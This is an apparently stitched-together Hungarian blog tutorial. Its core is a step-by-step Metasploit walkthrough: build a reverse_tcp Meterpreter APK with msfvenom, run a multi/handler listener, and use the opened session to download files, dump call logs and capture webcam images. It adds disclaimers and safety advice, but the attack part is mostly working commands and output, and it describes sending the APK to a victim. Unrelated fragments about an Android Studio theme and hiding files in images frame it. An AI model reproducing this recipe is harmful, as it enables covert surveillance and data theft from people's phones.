A filet masoljuk be a desktop/user/Android Studio XX/config/colors mappaba. Restart AS, es File/Settings/Colors&Fonts/Scheme-nel kivalasztjuk Eclipse-t
Nezzuk meg az alabbi kis videot, ahol azt targyaljak, hogy van 1-2 exploit androidban, amit meg mindig ki lehet hasznalni. Ezaltal gyakorlatilag (egy telepitett apk file utan) az egesz rendszerhez hozzafer a Hacker. Mivl ez egy defconos video igy nem illegalis.
Es akkor nezzuk konkretabban hogyan csinaljak: MetaSploit nevu kis cuccot hasznaljuk erre a celra, ami Kali Linux alatt van, es azt a celt szolgalja, hogy minel jobban le tudd tesztelni a rendszert. Ehhez fogunk hasznalni par dolgot:
- Oracle VirtualBox - Kali Linux 1.1 vagy 2.0 (en 1.1-et hasznaltam) - sajat androidos telefon vagy egy VM-es ISO android-al
Meg fogjuk hackelni a sajat telefonunkat, a sajat halozatunkon!!! Az osszes informaciot a youtube-rol szedtem enis, aki angolul tud az konnyen atlathatja jobban a dolgot. Telepitjuk VB-t, vagy ezek utan letoltjuk a szukseges ISO-kat, felrakjuk Kali Linuxot VirtualBoxra. Elinditjuk a Kalit. (Live mod), majd nyitunk egy terminalt.
Mostmar a metasploit-ot fogjuk hasznalni!
A terminalba irjuk a kovetkezoket:
msfvenom -p android/meterpreter/reverse_tcp LHOST=[SAJAT IP-d] LPORT=[AKARMILYEN PORT] R > app.apk
Es ennyi gyakorlatilag, ez a kliens resze mondhatni. Nezzuk a lenyeges reszeket, ami ezutan kovetkezik..
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST [SAJAT IP-d]
set LPORT [AKARMILYEN PORT]
exploit
[*] Started reverse handler on 192.168.0.*:4444 [*] Starting the payload handler...
General egy app.apk filet, amit a gyanutlan user ha elindit, akkor latszolag semmi sem tortenik...(olyan, mintha el sem indult volna, de amint elindul, kihasznalja az exploitot) Ezt az apk filet a hacker eljuttatja az aldozatnak es kesz is a baj. Megvarja, mig lefuttatja az apk-t...
Az elso parancs elinditja a metasploit console-jat. A kovetkezoben megmondjuk, hogy egy multi handler-t akarunk hasznalni. Beallitjuk a payload-ot, ami ugyanaz, mint az elso sorban volt ugye. (reverse_tcp payload) Majd beallitjuk a sajat IP-nk, es PORT-unkat, hiszen majd a kliens ide fogja kuldeni az adatokat erre a portra. Ez egy sima socket kapcsolat. A metasploit erre a celra irt szerver reszet nem latom, ezert nem tudom megmondnai, hogy tenylegesen mit csinal. Az apk-t visszafejtve arra jutottam, hogy gyakorlailag egy sima connectiont hoz letre a megadott adatokkal (itteni ip, port) majd finish-el az app, stb. Ilyenkor aktivalodik a session gyakorlatilag magaban a metasploit-ban, azaz kapjuk a kovetkezo dolgokat a Terminalban:
[*] Sending stage (40248 bytes) to 192.168.0.* [*] Meterpreter session 1 opened (192.168.0.*:4444 -> 192.168.0.28:59439) at yyyy-mm-dd...
Ok.
Sajat IP-t a Kali Linux terminalban ifconfig parancssal kapjuk meg.
A sessiont a hacker megszerezte, azaz elerheti a telefonod. Lassuk miket tud elerni a metasploit terminalon keresztul:
cd cat mkdir ls rm rmdir
upload download
dump_calllog
sysinfo
webcam_snap webcam_stream
Gyakorlatilag azert sokkal tobb dolgot, de most csak ennyit masoltam be. Vicces, hogy egy exploitot kihasznalva a hacker akarmit megtehet az android mobilunkkal..
Le tudja tolteni a filejainak, feltolteni tud dolgokat, a webkamerarol realtime kepet es stream-et tud lementeni, ugy hogy a telefon be sincs kapcsolva!!!! Szerencsere azert exploitokat talalni eleg nehez es maceras.
ES VEGUL: A LEIRTAK SZIGORUAN OKTATASI JELLEGGEL TORTENTEK, HOGY LASSUK ILYEN IS VAN, NEM VALLALOK FELELOSSEGET ERTE, HA KIPROBALOD. IGAZ EZ ITT CSAK MAGANHALOZATON MUKODIK, TEHAT MASIK IP-VEL NEM.
Es vegul, a fenti hack modszer hibai:
1, A Szerver listenert le kell futtatni a metasploitban, kali linuxon, es varni ameddig az aldozat el nem inditja az android appot. 2, Az android egy csodas dolog, igy maga az OP rendszer kilovi egy ido utan az apk-t, igy a kapcsolat megszakad. Visszafejtve az apk-t arra a megallapitasra jutottam, hogy minimum egy foregroundService-el kellett volna megirni jol. 3, A kapcsolat barmikor megszakadhat, mondjuk eleg hozza egy net szakadas. 4, A fenti generalt .apk tehat rosszul van megirva, illetve a metasploit ezen resze is rosszul van megirva. 5, Ha a kapcsolat megszakadt, akkor ujra exploit-ot kell futtatnunk a terminalban, mivel ekkor mar a szerver listener sem fog futni... 6. Ez a metasploit cucc tenyleg csak tesztelesre jo. 7, A help-el megkapott parameterek kozul nem mindegyik jo. 8, Nem probaltam ugyan, de elvileg 5.0-ban nem mukodik. (Talan patch van ra?)
Vegezetul #2: 1, Sose hasznalj olyan apk-t vagy alkalmazast, amirol nem tudod, hogy megbizhato a tartalma. Erre az sem garancia, hogy Google Play-ben fent van! En pl. ezert is fejtettem vissza ezt a metasploit altal generalt apk-t, mert nem biztam bennuk. 2, Ha mar etikus hackelgetnel, akkor sajat magad altal irt dologgal tedd, mert abbol legalabb tanulsz is, es tudod mi van a kodban. 3, A hackerkedes tanulasra jo, mason elkovetni BUNCSELEKMENY!
Windows-ban ezek utan a kep miniaturje ugyanugy lathato lesz, mintha egy kep lenne, hiszen az is! Hogyan erjuk el a rejtett tartalmat? Jobb klikk a file-on es: megnyitas winrar-al! Tadam!